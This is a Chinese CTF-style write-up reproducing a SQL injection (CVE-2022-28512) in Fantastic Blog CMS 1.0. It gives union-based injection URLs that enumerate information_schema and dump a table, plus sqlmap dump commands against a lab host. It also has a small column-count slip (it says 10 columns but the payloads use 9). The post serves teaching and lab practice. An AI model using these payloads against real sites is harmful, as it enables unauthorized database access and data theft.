【漏洞复现】Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)
Fantastic Blog CMS SQL注入漏洞(CVE-2022-28512)
0x01 靶场介绍
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
0x02 影响版本
Fantastic Blog CMS 1.0 版本
0x03 具体步骤
进入靶场,界面如下:
直接访问/single.php?id=1
按流程走,单引号闭合时出现错误回显
/single.php?id=2%27
order by 1页面显示正常,而order by 10时不正常,判断有10列
/single.php?id=2%27order%20by%2010--+
发现回显位2,4
/single.php?id=.2%27union%20select%201,2,3,4,5,6,7,8,9--+
当前数据库库名为ctf
继续查表名
/single.php?id=.2%27union%20select%201,2,3,group_concat(table_name),5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+
发现有个表名flag,继续查列
/single.php?id=.2%27union%20select%201,2,3,group_concat(column_name),5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=%27ctf%27%20and%20table_name=%27flag%27--+
继续找flag
/single.php?id=.2%27union%20select%201,2,3,group_concat(flag),5,6,7,8,9%20from%20flag--+
成功找到flag
0x04 使用sqlmap
sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" --dbs
sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" -D ctf --tables
sqlmap -u "http://eci-2ze4m6m66jjj9up7zvkn.cloudeci1.ichunqiu.com/single.php?id=-2" -D ctf -T flag --dump
0x05 总结
平平无奇的一场注入,没有任何屏蔽,不需要考虑绕过,典型的SQL注入流程。
本文来自博客园,作者:0dot7,转载请注明原文链接:https://www.cnblogs.com/0dot7/p/17220431.html
文章如有错误,欢迎各位师傅指正!!!
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!